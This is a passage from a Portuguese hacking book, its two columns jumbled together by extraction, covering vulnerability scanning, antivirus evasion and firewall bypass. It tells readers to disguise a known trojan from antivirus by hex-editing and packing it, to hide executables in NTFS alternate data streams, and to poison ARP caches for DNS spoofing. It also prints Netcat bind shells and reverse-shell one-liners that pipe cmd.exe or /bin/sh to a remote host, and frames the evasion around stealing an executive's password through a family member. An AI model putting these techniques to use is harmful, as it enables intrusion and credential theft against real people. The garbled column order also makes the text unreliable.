enviar os resultados esse ltimo, j que voc pode varrer um host e, aps identificao de possveis furos no sistema.
por e-mail). Enfim, observa-se que so muitas as opes. alguns dias, varrer o 7.8 Softwares
A ltima o mesmo novamente. O Nessus s vai mostrar a diferena 7.8.1 Windows
scanneamento contnuo, com a opo de definir o tempo entre os dois). Languard Network Scanner (www.gfi.com)
entre duas Em Target selection voc vai definir o alvo: se um IP, um Shadow Security Scanner (www.safety-lab.com)
varreduras. domnio, Retina (www.eeye.com)
A escolha do alvo ser mostrada por ltimo, vamos ver um intervalo etc. Pode escolher tambm se deseja realizar Syhunt (www.syhunt.com)
agora a aba uma 89
Usurio. transferncia de zona (til para descobrir domnios como 7.8.2 Linux
84 servidor de correio Nessus (www.nessus.org)
Nela, voc pode definir regras para rejeitar ou aceitar mx), pode salvar a sesso, restaurar uma sesso e deletar Saint (http://www.wwdsi.com/saint/)
determinado sesso. Aps 7.9 Soluo
endereo/intervalo. Na imagem anterior, foi solicitado 87 As falhas sempre vo acontecer, por mais caro que os
que os pacotes acrescentar seus alvos e configurar todo o resto que seus softwares
relacionados ao IP 192.168.1.5 fossem rejeitados e que o mostramos possam ter custado. A melhor maneira, ento, de se
restante fosse anteriormente, clique em Start the scan (iniciar o proteger estar
aceito por padro (default accept). Isso interessante scanneamento). A janela sempre realizando o Penetration Test (por isso citei
principalmente a seguir mostra o progresso dos alvos: anteriormente que era
quando voc manda o Nessus varrer um intervalo grande Cada quadrinho desse um endereo. O interessante importante), passando scanners de vulnerabilidades e
de endereos IPs, que o Nessus pesquisando
sendo que o seu est no meio. Como fazer para ele no no os varre um por um e, sim, simultaneamente. As duas manualmente. Assim, voc estar sempre corrigindo os
scannear voc barras direita problemas dos seus
85 de cada endereo so Portscan, at onde foi a varredura softwares antes que algum possa se aproveitar dessas
mesmo? Voc deve solicitar que ele rejeite o seu, de portas, e falhas e us-las
passando direto para o Attack, a realizao do ataque para descoberta de para ganhar controle do sistema.
prximo. falhas em si. Clicando no Tente se inscrever em listas de discusso sobre falhas
A Knowledge Base (Base de Conhecimento) permite ao boto Stop, voc pode parar a varredura de um dos (como a famosa
Nessus endereos ou bugtraq, disponvel em <www.securityfocus.com>) para
aprender e facilitar o trabalho de novos simplesmente clique em Stop the whole test para cessar se manter
scanneamentos. Ao marcar a totalmente o atualizado sobre os ltimos bugs encontrados.
opo KB saving, voc poder escolher entre testar todos processo. Na prxima janela, voc v o resultado do que 90
os hosts sempre, fizemos. 8 Burlando Protees
88
At aqui j temos uma boa viso de como procedermos. 8.1.1 Alterao em Hexadecimal Ao modificar algumas strings, voc no obteve muito
Antes de Atualmente, pela quantidade de vrus existente e pelo sucesso? Vamos
decidirmos o caminho que tomaremos (se exploramos uma volume cada usar ento um editor de recursos para trabalharmos
falha; se vez maior de arquivos a serem analisados, o antivrus tem diretamente com o
resolvemos, caso nenhuma falha tenha sido encontrada, que ter um programa. Que tipo de recursos? Desde strings a
utilizar a processo rpido de identificao de infeco. Ele faz isso imagens, passando por
Engenharia Social e malware - trojans etc. -; se analisando uma alguns trechos de cdigo e formulrios que podem ser
tentaremos sniffar a rede), seqncia de caracteres dentro dos arquivos: se encontrar facilmente alterados.
temos que checar as protees que o sistema-alvo possui alguma que 92
e descobrir como esteja no seu banco de dados, ele identifica como vrus. Primeiro, vou dar uma viso geral da nossa ferramenta, o
burlar todas elas. Assim, passaremos despercebidos Se modificarmos PE Explorer
dentro do sistema. essa seqncia especfica ou simplesmente realizarmos (tambm chamado de Resource Explorer, em sua verso
Vamos nos concentrar em como burlar trs tipos de alguma alterao no mais limitada).
ferramentas: o texto que est dentro do executvel (obviamente estando Essa ferramenta feita pela empresa Heaventools e
antivrus, o firewall e o IDS. So os mais importantes e, sempre funciona por 30 dias
quando realizando backups e testando para no correr o risco de para experimentao.
contornados, nos abriro caminho para novos ataques. corromper e Temos aqui uma imagem do programa rodando e
8.1 Burlando o Antivrus perder o arquivo), o antivrus no mais detectar o visualizando
Um passo muito importante impedir um programa software malicioso. imagens que esto dentro de um arquivo binrio. Voc
malicioso de ser 91 poderia trocar as
detectado pelos antivrus de hoje. Uma deteco poderia Para isso, pode-se usar um editor hexadecimal qualquer, imagens, baix-las para o seu disco ou simplesmente
estragar todo o como o apagar o recurso, o
trabalho anterior que voc teve at aqui. Outra coisa a XVI32, mostrado a seguir. Ele permite que voc altere em que til para evitar deteco do antivrus.
ser lembrada que, hexa ou ascii Observe a figura anterior. Dentro de RC DATA esto
ao contrrio de firewalls e IDSs que so mais usados em qualquer parte do arquivo. vrios cones. O
ambientes Altere recursos como strings inteis, endereos de arquivos que parece ser uma pequena casinha amarela, so
corporativos, praticamente todo mundo usa antivrus. no disco, unidades de cdigo
Suponhamos que voc deseje obter uma senha de acesso chaves do registro e assinaturas diversas. Lembrando que (units) criadas pelo Delphi (Object Pascal). Dentro da unit
de algum interessante TFRMAINFORM
executivo de uma empresa muito importante. Dentro da fazer alguns backups do arquivo original para que, caso (formulrio principal), temos vrios recursos e em um deles
empresa, os filtros o programa seja encontramos
de segurana no permitem arquivos anexos, mesmo que corrompido, voc possa retomar o original. Se isso no for algumas imagens. Veja que interessante: o PE Explorer
no sejam o suficiente, consegue realmente
detectados vrus. Ento, voc manda um e-mail para a vamos tentar um processo um pouco mais potente. dissecar o executvel e nos mostrar quase que o seu
esposa ou filho Trabalharemos cdigo original
dessa pessoa, sabendo que eles lero no computador de diretamente com os recursos que esto dentro do graficamente. No caso da imagem, poderamos tomar a
casa que, executvel. ao que
normalmente, s possui o antivrus como proteo. Como Vamos ver, a seguir, como fazer isso de modo fcil e quisssemos: editar, salvar, apagar etc.
quase todo rpido, utilizando 93
mundo confia cegamente no antivrus, se ele no acusar um programa comercial prprio para esse tipo de tarefa. E no so somente executveis que voc pode modificar,
nada no anexo que 8.1.2 Apagando Recursos do Executvel no. De
vier por e-mail, a chance de abrirem muito alta.
nada adiantaria voc modificar um programa que cria Existem muitos programas que realizam essa tarefa, tais indetectvel (dica: sempre teste com vrios antivrus antes
uma DLL que continua como UPX, de envi-lo a
sendo identificada pelo antivrus. Abra esse DLL e a Petite, Aspack, Mew e outros. Na seo de programas, no algum, j que o mtodo de deteco pode variar de
modifique tambm, fim deste programa para
como mostrado a seguir: captulo, sero passados diversos links para esses programa). um processo simples, mas extremamente
No exemplo anterior, podemos modificar as chaves do softwares. Observe um eficiente, que, se
registro que o exemplo de como o Norton Antivrus (poderia ser combinado com os que eu mostrei anteriormente,
arquivo DLL vai utilizar. Imagine as inmeras utilidades qualquer outro) reage consegue esconder
que isso poderia nos quando mandamos esconder um cavalo de tria muito qualquer arquivo ou programa.
trazer. A mais bvia seria retirar o executvel da conhecido, o Netbus. Algumas vezes, no compressor pode ocorrer um erro. Isso
inicializao em chaves Para isso, vamos utilizar o compressor de executveis geralmente
muito conhecidas (como chamado Petite. ocorre quando o arquivo executvel j est comprimido.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run Primeiramente, mandamos o antivrus detectar uma cpia Alguns trojans por
) e colocar em do programa exemplo, como o Beast, j geram seus executveis assim.
outras mais discretas, que demoraro mais para serem malicioso, antes de ter sido comprimida. A dica tentar
descobertas. Vejamos o resultado dessa verificao: descomprimir esses arquivos usando o PE Explorer. Ele
Lembre-se que todos os detalhes so importantes para 95 possui plugins como
evitar ser detectado Veja que ele detectou o cavalo de tria, dizendo Infeco o do compactador UPX, permitindo voltar o arquivo ao
posteriormente. encontrada, seu estado original.
O programa possui inmeros outros recursos, os quais no e logo em seguida excluiu o arquivo. Muito bem, vamos Novamente, um programa muito til.
citarei pegar a cpia desse 8.1.4 Alternate Data Streams
aqui, pois fogem do assunto. O importante lembrar que mesmo executvel detectado e passar o compressor de Como esconder um arquivo do anti-vrus, alm do mtodo
ele uma executveis Petite, da
ferramenta muito til para ajudar a esconder programas como voc v a seguir. Essa barra no programa mostra os compresso de executveis? Um recurso interessante nos
do antivrus. recursos sendo Windows mais
94 comprimidos, tarefa que rapidamente realizada. recentes, graas ao sistema de arquivos NTFS o
8.1.3 Compresso de Executveis 96 Alternate Data Streams.
Um outro timo recurso disposio o compressor de Com o servidor comprimido, vamos novamente pedir ao um stream de dados que pode ser adicionado a um
executveis. Norton para arquivo j existente,
No, no um compressor do tipo ZIP, RAR ou algo do verificar o arquivo servercompress.exe, que foi gerado mas que fica 100% oculto para qualquer pessoa que
tipo. um programa pelo Petite. Clicamos acesse o sistema.
que comprime os recursos do prprio executvel (como nele com o boto direito e colocamos Verificar com o 98
espaos vazios), Norton Antivrus. O conceito simples, s separar o arquivo principal do
reduzindo o tamanho do arquivo, mas fazendo com que Qual ser o resultado? Esse excelente antivrus comercial stream de dados atravs de ( : ) , dois
ele continue vai ser to pontos. Seria ento algo como -> marcos.jpg:arquivo.doc ,
podendo ser executado normalmente. Isso normalmente facilmente enganado? Apesar de, na teoria, sabermos por exemplo.
muda o checksum que simples, na Exemplo:
do programa (falaremos sobre isso nos captulos sobre prtica, o impacto maior. Confira na imagem a seguir: Eu possuo o arquivo comentrios.txt em um diretrio
proteo) e, s 97 C:\MARCOS. Eu poderia ento criar um
vezes, comprime alguns trechos de cdigo que o antivrus Nenhuma infeco foi encontrada. O arquivo est novo arquivo de texto adicional e joga-lo no stream de
utilizava para completamente dados (alternate data streams, o apenas
detectar. Resultado? No detecta mais. ADS) do primeiro arquivo.
C:\MARCOS> type esse texto estar oculto > ficou bloqueada para todos os endereos IPs que vinham e Mozilla possuem essa configurao, ou seja, voc pode
comentrios.txt:oculto.txt do Brasil. Como eu navegar annimo
Eu posso criar streams de dados com arquivos executveis faria para acessar esse recurso, ento? Veremos nessa em qualquer um deles. A seguir, voc observa onde as
tambm. Exemplo: seo. configuraes de
C:\MARCOS> type c:\windows\system32\calc.exe > 99 proxy ficam no Internet Explorer.
comentrios.txt:secreto.exe 8.2.1 Servidores Proxy 101
Copiei a calculadora para dentro do ADS do Quando temos um nico computador com acesso Internet Observe que existem dois crculos vermelhos. Isso porque
comentrios.txt, e coloquei o nome como dentro de voc pode
secreto.exe. uma rede, geralmente o chamamos de gateway (porto). configurar o servidor proxy em dois locais. O primeiro
E para executar isso ? Para esse sistema boto, Configuraes,
Voc deve passar o caminho completo do arquivo, fornecer acesso aos outros, ele poderia utilizar utilizado para configurar quando voc est navegando
utilizando o comando start. Exemplo: roteamento normal, o que por linha discada ou
C:\MARCOS> start faria com que programas como MSN, ICQ e IRC fossem por banda larga utilizando um provedor que requer
c:\MARCOS\comentarios.txt:secreto.exe rodados autenticao. Voc
Pronto. A calculadora ser iniciada. Ateno pois s normalmente nos computadores que vo utilizar o acesso seleciona a conexo esquerda (no caso da imagem, o
possvel criar streams de dados em ou o que muitas IG) e clica no
arquivos j existentes, no d pra criar ambos ao empresas fazem usar um servidor proxy nesse gateway. boto. Configuraes da LAN o local para se
mesmo tempo. Quase sempre o configurar quando voc
8.2 Burlando o Firewall proxy fornece acesso apenas a servidores Web e, em acessa a Internet atravs de rede local. Em ambos os
O prximo passo descobrirmos como fazer para burlar alguns casos, casos, voc vai
a proteo de servidores de FTP. Seria uma soluo mais segura. encontrar a seguinte opo para incluir o proxy:
um firewall de acesso. Isso muito importante, pois de O problema que, se o endereo IP do gateway for 102
nada adianta pblico e as Simplesmente insira o endereo e a porta que est no site
instalar uma porta dos fundos no sistema ou executar uma configuraes de segurana do proxy no forem bem e saia
falha que configuradas, qualquer navegando. Se ocorrer um erro, tente outro. Pode ser que
fornea um shell reverso se o firewall barrar. No vou pessoa na Internet pode utilizar esse servidor para o proxy no
entrar em detalhes navegar utilizando um esteja mais disponvel. Faa um teste interessante: aps
sobre o funcionamento desse tipo de proteo, j que endereo diferente. Assim, todo site visitado registraria o utilizar um
existe uma seo que IP do proxy, e no endereo de outro pas, entre no Google. No meu
abordar o assunto no captulo referente segurana. o do usurio que est navegando por ele. exemplo, ele mostrou o
Geralmente, o firewall configurado para uma excelente Mas onde conseguir endereos de servidores proxy google do Japo, local que est o proxy que estou
proteo de atualizados? Tente usando, demonstrando
fora para dentro, deixando passar, muitas vezes, apenas os sites <www.proxy4free.com> e que realmente eu no estou sendo detectado. Se ainda
conexes a <www.publicproxyservers.com>, que tiver dvidas, visite
servidores Web, de correio e algum tipo de servio contm uma lista diria de novos proxys. Veja, a seguir, o <www.stayinvisible.com> e clique em Test my IP para
remoto que possua site Proxy4free tentar descobrir o
autenticao segura, como SSh. com sua lista diria de proxys. seu endereo IP e ver se est realmente oculto.
Outras vezes, ele configurado para barrar apenas 100 Esse tipo de recursos tambm est disponvel para e-mails
endereos Configurar o proxy no seu navegador muito simples, (remailers), clientes de MSN, Telnet, ICQ, IRC e outros
especficos. Exemplo: durante algum tempo, uma seo do geralmente em (socks/wingate).
site da Nasa Opes/Conexo/Rede ou algo assim, varia entre cada s pesquisar nos sites citados que voc encontrar links de
um. Tanto IE, Opera servidores para
esses servios. O modo de se configurar bem parecido o nosso. Esse pacote ir at o seu destino e ser 104
com o do browser. processado por ele de 8.2.4 IP Spoofing Cego
8.2.2 Spoofing alguma maneira, seja enviando uma resposta ou Nessa situao, estamos fora da nossa subrede, de uma
Spoofing a arte de criar informaes de rede falsas e simplesmente recusandoo. rede local e,
utiliz-los para Agora como faremos para ver essa resposta, j que o conseqentemente, no podemos farejar o trfego de
diversos propsitos: evitar ser capturado nos logs do endereo que est resposta. Esse
sistema fazendo o que na informao enviada no o nosso? A resposta spoofing s til em casos em que voc no precisa
no devia, realizar scanneamentos estando totalmente simples: se estamos em receber um pacote de
ocultado ou ganhar uma rede local, podemos sniffar (farejar a rede), como volta. Exemplos: enviar e-mails, realizar Denial of Service
acesso a mquinas que so protegidas por configuraes visto no captulo etc. Tambm
de firewall. Um 103 podemos utiliz-los para tentar acesso aos antigos
dos tipos de Spoofing, o IP Spoofing. Exemplo: uma sobre sniffers. Isso seria o spoofing no-cego, pois voc servios R baseados em
mquina da rede pode ver a resposta autenticao por IP (rlogin, rsh etc.). Sabendo o endereo
interna s aceita comunicar-se com o endereo IP do alvo, mesmo que ela seja endereada a um endereo IP certo e
192.168.0.1 e o seu falso e inexistente. enviando os comandos necessrios, voc poderia realizar
192.168.0.110. Voc no poderia mudar o seu endereo, DNS Spoofing alguma
isso criaria um Realizar DNS Spoofing, consiste em interceptar o trfego configurao de firewall ou execuo de backdoor e,
conflito na rede. Mas voc poderia utilizar o IP Spoofing, da rede assim, obter acesso
uma das tcnicas (atravs de arp poisoning por exemplo) e utilizar posterior mquina ou mesmo conexo reversa utilizando
mais usadas para personificar quem voc no . respostas forjadas para as o Netcat, por
Para simplificar, pense da seguinte maneira: como voc requisies DNS dos clientes. Seja um A, PTR, MX, ou exemplo (veremos isso um pouco mais frente).
chegar em qualquer outro Como o spoofing cego no interessante para este
algum local que te peam um documento e voc mostrar registro , todos eles sero falsificados de acordo com as captulo, vou
uma identidade nossas demonstrar como realizar facilmente um spoofing no-
falsa. Essa identidade no tem foto, somente um nome. A necessidades. Assim, sempre que a nossa vtima tentar se cego em uma rede
pessoa que est conectar por local.
fazendo a segurana checa o nome, v que est na sua exemplo em www.microsoft.com, ele ser enviado para o 8.2.5 Sterm
lista e deixa entrar. endereo IP de Sterm um programa interessante. primeira vista,
Apesar de ser tecnicamente um pouco complexo, o www.linux.org, ou outro que quisermos. apenas um
conceito de spoofing Um programa que faz isso de forma bem fcil, o cliente de Telnet comum, do tipo coloque o endereo IP e
bem simples. Temos vrios tipos: ARP Spoofing (spoofing Ettercap. Um de seus a porta, sem
de endereos MAC plugins, permite utilizar o DNS Spoofing. s configurar e nenhuma outra opo. Ledo engano. o mais poderoso
de rede atravs do protocolo ARP), DNS Spoofing e, depois habilitar o programa de
claro, IP Spoofing. plugin. Realizar ento um arp poisoning em todos os hosts realizao de IP spoofing para o sistema Windows,
Vamos falar sobre este ltimo. Para comear, existem dois da rede, conseguindo realizar a
tipos: IP utilizando o comando: fantstica faanha de realizar um spoof full-duplex (ele
spoofing cego e no-cego. ettercap Tq M arp // consegue receber os
8.2.3 IP Spoofing No-cego Ele ir envenenar o cache arp de todas as mquinas da dados tambm, sem voc precisar ficar utilizando um
Por que no-cego? Geralmente, quando realizamos IP rede, fazendo o sniffer parte para
spoofing, trfego passar por voc, e realizar o DNS Spoofing fazer isso). Quando realizar uma conexo, ser como se
modificamos o pacote a ser enviado, colocando outro automaticamente. tivesse em uma
endereo que no seja Tambm existe o modo GUI, caso queira tentar.
sesso de Telnet comum, o que facilita muito o trabalho Deixe as opes ARPReply Timeout e TCP Timeout nos senhas aleatrias (sim, o Netwox tambm faz isso, afinal,
de entrar de modo nmeros padres. Se so 216 funes
oculto em algum local. achar que a conexo est um pouco lenta, tente diminu- diferentes), este o programa a ser usado. complexo
Para conseguir essa faanha, o sterm se vale do ARP los um pouco at de se usar, mas
poisoning/spoofing. O pedido ARP est essencialmente que voc se sinta satisfeito. O resultado, observamos na infinitamente mais avanado que o STERM.
perguntando: Qual sequncia: Seja qual programa for a sua escolha, a tcnica em si
o endereo de hardware correspondente ao endereo IP Observe a barra inferior do programa: Conectado a uma excelente
que tenho aqui?. 10.125.0.1 ferramenta para conseguirmos burlar filtros de firewalls e
Normalmente, somente o host com o IP correspondente impersonando 10.125.0.66. Significa que o spoofing foi acessar locais nos
envia uma resposta um sucesso. Outra quais antes no poderamos. Se, na Internet, podemos
ARP e o resto dos computadores ignora o pedido ARP. Ele linha interessante Poisoning Targets ARP Cache, que fazer isso com
envenena ento o significa servidores proxy annimos, em uma rede interna s
cache ARP dos computadores que mantm a lista dos Envenenando o cache ARP do alvo. O nico problema do conseguimos essa
endereos MAC e seus STERM que, faanha atravs do spoofing.
respectivos endereos IPs, respondendo com o endereo IP apesar de fantstico, ele s consegue realizar spoofing 8.2.7 Conexo Reversa
que voc quiser. no-cego. Para s vezes precisamos colocar uma porta dos fundos em
De fato, to simples fazer isso que, na configurao do tentar realizar um spoofing cego, voc precisaria de um algum sistema
programa, ele lhe programa e acessar remotamente. Mas o que dizer das redes
pergunta que IP voc gostaria de ter, como se pode ver a ligeiramente mais avanado. Na prxima seo, o internas, por exemplo?
seguir. Netwox apresentado. Como acessar um sistema que possui endereo IP privado?
105 8.2.6 Netwox Ou sistemas no
Aps decidir o adaptador de rede, o endereo IP falso e, Sute de diversas ferramentas teis de sistema e rede, qual o firewall filtra quase tudo que entra, deixando
ainda, ter a baseado na pouqussimas brechas a
possibilidade de escolher se vai realizar um MAC real ou biblioteca Netwib. Esse software, disponvel para diversas serem exploradas? Bom, se no conseguirmos nos conectar
spoofado (Mesmo plataformas, a algum
sendo o MAC falso, o programa consegue receber as permite realizar desde tarefas simples, como acessar um 108
informaes de volta? FTP ,Telnet ou dentro dessa barreira, podemos fazer o contrrio: o
Por qu? Ele cria entradas duplas no ARP.), j estamos HTTP, passando por gerar hashs MD5, testar se algum prprio programa se
prontos para nos diretrio seguro, conectar ao nosso sistema de volta, burlando, assim, a
conectarmos onde for. D OK e clique no primeiro sniffar a rede, realizar Synflood, traar rota, pingar, at maioria dos filtros
botozinho (um verdinho) spoffing de pacotes de segurana, permitindo que acessemos endereos
do programa. A opo a seguir aparecer para que ICMP, Ethernet, UDP, TCP, DNS e IP. Ele possui, ao todo, privados.
voc escreva o endereo 216 funes das Hoje, realizar esse processo mais simples do que
IP e a porta que iremos nos conectar. mais diversas. Essas que citei no so nem 20% do que o parece. No captulo
Clique em OK e pronto! Voc estar realizando um programa reliza. sobre malware, backdoors e trojans, veremos alguns
spoofing de A seguir, o menu principal do Netwox. programas que
endereo IP, estando annimo na sua conexo e, como 107 conseguem realizar isso de modo muito fcil. Mas, para
pode ver, parece Se voc deseja trabalhar com Ipv4 ou Ipv6, realizar demonstrar, usarei
106 spoofing um programa em modo texto, o chamado canivete suo
que est utilizando uma sesso de Telnet comum, como avanado, ter controle total dos seus pacotes enviados ou do TCP/IP.
qualquer outra. mesmo gerar Apresentamos o Netcat:
Comandos:
Conectar-se a algum local: diferenas das verses para sistemas compatveis com por um firewall de entrada, eu no conseguiria me
nc [-opes] endereo porta[s] [portas] ... Unix. Uma das conectar a ele. A, s
Aguardar conexes de entrada: funes mais utilizadas para o Netcat faz-lo servir de teria uma soluo: inverter a conexo e faz-lo enviar o
nc l p porta [opes] [endereo] [porta] porta dos fundos. shell de comandos
As opes so descritas a seguir: Com um simples comando, podemos fazer com que ele para mim. Isso me permitir o acesso. Mas como faremos
-d: Modo escondido, desligado do console. aguarde conexes e isso? Utilizando
-e programa: Programa a ser executado. jogue as pessoas conectadas no shell (prompt de um conceito simples.
-g gateway: Pontos de roteamento de origem (at 8). comandos) do sistema. Voc conhece o smbolo |? Muito utilizado nos tempos
-G num: Ponteiros de roteamento de origem (4, 8, 12 nc L p 100 e cmd.exe do DOS, ns o
etc.). O comando anterior faria o programa escutar de modo chamamos de pipe. Ele serve para concatenar a sada de
-h: Ajuda. avanado (-L) um comando para
-i segundos: Diminui o intervalo para as linhas enviadas, a porta (-p) 100 do sistema e nela executar (-e) o a entrada de outro. Por exemplo, se eu digitasse o
portas comando cmd.exe, que comando echo s | Del
scanneadas. o shell do sistema. No caso de um sistema Linux, por *.*, estaria fazendo o seguinte: executando o comando
109 exemplo, poderamos echo, que
-l: Modo de escuta simples. trocar por /bin/sh ou /bin/bash, mas vamos incrementar mostraria a letra s na tela. O pipe pegaria essa letra e
-L: Modo de escuta avanado. Reconecta se a conexo esse comando. enviaria para a
cair. Vamos incluir a opo de s mostra endereos IPs em vez entrada do comando Del *.* (apagar tudo). Isso faria com
-n: Somente IPs. No mostra nomes de domnios. de nome de que a
-o: Mostra o trfego em hexadecimal. domnios (-n) quando algum se conectar. E tambm um confirmao de sim ou no que o programa pede antes
-p porta: Nmero de porta local. pouco de eco (-v) de apagar arquivos
-r: Randomizar porta remota e porta local. para que possamos visualizar o que est acontecendo no fosse burlada e passaria direto. Faa o teste desse
-s endereo: Endereo de origem local. sistema. Ficaria comando depois em
-t: Responder negociao Telnet. assim: algum diretrio que no tenha arquivos importantes ou
-u: Modo UDP. nc L n vv p 100 e cmd.exe em um disquete; vai
-v: Eco (verbose) - use duas vezes para um efeito O resultado: entender o que estou dizendo.
melhor. 110 111
-w segundos: Tempo de durao para conexo e Na imagem anterior, rodamos o Netcat como servidor em Vou tentar transformar em comandos a seguinte sentena:
leitura. uma janela Conecte-se ao endereo IP 10.125.0.136, na porta 53,
-z: Modo zero E/S (entrada/sada) - usado para de prompt do Ms-Dos. Depois, em outra, conectamos por redirecione a sada
scannear. Telnet a porta 100 do que for recebido na conexo para o programa
Por que esse programa chamado de canivete suo? que foi aberta e, como esperado, obtemos o shell do cmd.exe e envie o
Ele um dos mais sistema de volta. Se resultado dessa sada para uma conexo feita ao mesmo
simples e, ao mesmo tempo, completo programa de voc quisesse, ainda poderia utilizar a opo d IP 10.125.0.136,
conexo. Alm de (desconectar do console), o na porta 79.
conseguir se passar por um cliente de Telnet, conectando- que deixaria a janela do programa invisvel, sendo vista Isso ficar assim:
se a qualquer apenas nos nc 10.125.0.136 53 | cmd.exe | nc 10.125.0.136 79
sistema, tambm pode ser utilizado como servidor. A processos do sistema. Dica: No necessrio utilizar o Netcat para realizar
verso, na imagem Onde est o problema a? Bom, se o computador em que essa tarefa. Em um
anterior, foi a compatvel com Windows NT, mas existem eu quero sistema Linux, por exemplo, voc pode utilizar o prprio
pouqussimas colocar a porta dos fundos tiver um endereo IP privado Telnet, poupando o
ou for protegido
trabalho de ter que enviar o nc ao sistema. Exemplo de conceito simples, utilize-se de Engenharia Social, crie um para tudo existe um remdio, ns veremos como burlar
como ficaria: arquivo de lote tambm essa
telnet 10.125.0.136 53 | /bin/sh | telnet 10.125.0.136 ou um script, realize injeo ou cross site scripting (o modo proteo atravs do recurso conhecido como tunneling ou
79 no importa, tunelamento.
Vamos utilizar o primeiro exemplo. Recapitulando: o voc precisa executar esse comando no computador que 8.2.8 Tunneling
programa se deseja acessar) e, Vamos falar aqui sobre a habilidade de se conseguir
conectar a um endereo IP, passar o que for recebido se ele no for acessvel apenas por Telnet, copiar o nc realizar conexes
durante a conexo para dentro desse TCP atravs de um servidor proxy. Muitas vezes, um
para o shell do sistema e enviar o resultado para o sistema: firewall barra muitas
mesmo endereo IP, s nc 10.125.0.136 53 | cmd.exe | nc 10.125.0.136 79 conexes, mas geralmente a conexo utilizando o
que em outra porta. Bom, agora, a vez de o invasor O que ir acontecer ento? Para a pessoa que digitou protocolo HTTP
agir. Ele precisa abrir isso no 114
as duas portas com o Netcat para receber a conexo computador-alvo, no aparecer nenhuma resposta (por permitida e, na maioria dos casos, realizada atravs de
antes que o comando isso, interessante um servidor proxy.
anterior seja digitado. As portas podem ser qualquer colocar o script de execuo para esconder a janela). No Quando uma conexo HTTP realizada atravs de um
uma, mas prefira nosso sistema, proxy, o cliente
portas que os filtros de firewalls costumam barrar menos, uma das janelas que abrimos, a da porta 53, servir (geralmente o navegador) envia o pedido ao proxy. Este,
como 80 para digitarmos os abre a conexo
(HTTP/Web), 21 (FTP) ou 53 (DNS). comandos, que sero redirecionados pelo pipe e com o destino, envia o pedido, recebe a resposta e envia
Abra duas janelas diferentes do prompt do MS-DOS. enviados ao shell de de volta ao cliente.
Coloque uma acima ou comandos. Aps ele os processar (como, por exemplo, o O protocolo HTTP possui um mtodo de requerimento
do lado da outra. Digite o comando a seguir para abrir a comando dir, chamado de Connect.
primeira das duas gerando uma listagem de diretrios), ir enviar o Esse mtodo usado pelo cliente para dizer ao servidor
portas necessrias para se obter a conexo reversa: resultado do que apareceu proxy que est
Abrimos o Netcat como servidor, em modo de escuta para a conexo na janela que sobrou, a da porta 79. A sendo requerida uma conexo a determinado endereo.
avanada, seguir, voc v as Se o servidor proxy permite essas conexes, ele tenta se
identificando somente endereos IPs, com eco (verbose) nossas duas janelas e a conexo reversa acontecendo. conectar ao
duplo e abrindo a 113 endereo especificado no cabealho do pedido. Se a
112 Com isso, conseguimos acessar o computador de uma rede operao falhar, ele
porta 53. Perceba que a nica diferena dessa vez para interna e envia de volta ao cliente (o navegador) uma resposta
o nosso primeiro burlar eventuais regras de firewall. Existem muitos negativa e fecha a
exemplo que no usamos o comando (-e) para executar backdoors, scripts e conexo. Se a operao for um sucesso, ele envia de
o shell de trojans que realizam conexo reversa. Achei interessante volta uma resposta
comandos. Ele no mais necessrio na conexo reversa. demonstrar com o positiva e a conexo considerada estabelecida. Depois
Deixe essa janela Netcat para que o conceito ficasse bem entendido. Mas disso, o proxy no
aberta e v outra que voc abriu. Nela, novamente existe um outro se preocupa com que dados so transferidos entre o
digite o comando, problema: e se a rede interna que queremos ter acesso cliente que pediu a
mudando apenas a porta. permitir que os conexo e o destino. Ele simplesmente envia os dados em
Agora, com as duas portas j escutando a conexo, computadores s naveguem atravs de um servidor ambas as
hora de rodar o proxy? Ou seja, s direes, agindo como um tnel. Esse tunelamento
comando que preparamos anteriormente para podermos poderiam abrir pginas Web, impossibilitando a conexo (tunneling) no uma
receber o shell. O reversa. Mas como
tcnica nova. J utilizada muito em protocolos como influenciar o funcionamento do programa, so apenas ferramenta (um script perl) est na seo Software desse
IPSec e SSh, mas a extras como opo de captulo.
vantagem do tunneling em HTTP que a segurana testar a conexo e se desejar que o programa inicie junto Host
geralmente muito com o Windows. interno
menor do que nesses outros protocolos de VPN. V para a aba Configure Software. (escravo)
Existem backdoors que realizam tunneling com conexo 116 Firewall
reversa e, Aqui o processo tambm simples. Selecione o software (rede local/
trojans que tm opo de tunneling em seus plugins, como que voc Internet)
outras deseja (a ajuda do programa tambm explica como Servidor do
ferramentas do underground. Vamos ver algumas opes incluir facilmente Cracker
mais seguras para outros, como clientes de Telnet e FTP), feche esses (mestre)
podermos burlar um firewall com facilidade. Na programas se estiverem 118
realidade, teremos apenas ativos, clique em Apply (aplicar) e inicie novamente os Um programa rodado no host interno, que cria uma
duas: o software comercial HTTP Tunnel e o opensource programas. Eles cpia todo dia
GNU http Tunnel. estaro automaticamente configurados para acessar em uma hora especificada. Para o firewall, essa cpia
Ambos instalam um servidor Socks local, que faz a ponte atravs do proxy. um age como um usurio
para o processo bem simples, no? Agora, para observar as comum, usando o Internet Explorer para surfar na
tunnelamento. A diferena a facilidade de uso: o conexes acontecendo, Internet. Na realidade,
comercial grfico e o s clicar em Status. o programa executa um shell local e se conecta ao
gratuito/opensource em modo texto. Demonstrarei como 117 servidor Web do cracker
simples de se Prontinho! Veja as conexes ativas na figura anterior. atravs de uma conexo HTTP aparentemente legtima. A
utilizar o primeiro. Voc j est resposta que o
Observao: at a poca em que esse livro estava sendo navegando atravs do proxy e tambm burlando servidor do invasor fornecer, tambm parecendo
escrito, o HTTP eventuais legtima, , na realidade,
Tunnel era livre para uso em baixas velocidades, configuraes de firewall. Isso interessante de se fazer os comandos que o backdoor ir executar no shell local.
necessitando-se pagar quando uma Todo o trfego ser
apenas uma taxa para velocidades maiores. empresa bloqueia acesso aos funcionrios de usarem criptografado para Base64 e ser fornecido como um
Primeiramente, abra o HTTP Tunnel. V at a opo programas como valor de CGI para
Tunnel Settings. Kazaa e MSN. Claro que, se impediram, devem ter um evitar que entre no cache. Exemplo de uma conexo:
Vamos deixar a opo Status por ltimo. bom motivo, Escravo (Slave)
115 portanto, se utilizar o tunneling no trabalho, tenha muito GET /cgi-
Nessa opo, voc ir configurar se quer que o programa cuidado. bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb
autodetecte Vamos ver, agora, o exemplo de um backdoor (porta dos 1He7krj
as configuraes de rede, se ele deve burlar apenas o fundos) que HTTP/1.0
firewall sem nenhum tambm possui o recurso de HTTP tunneling. Mestre (Master) responde com
proxy ou, se voc quiser, pode especificar diretamente as 8.2.8.1 WWW_Shell_Reverso g5mAlfbknz
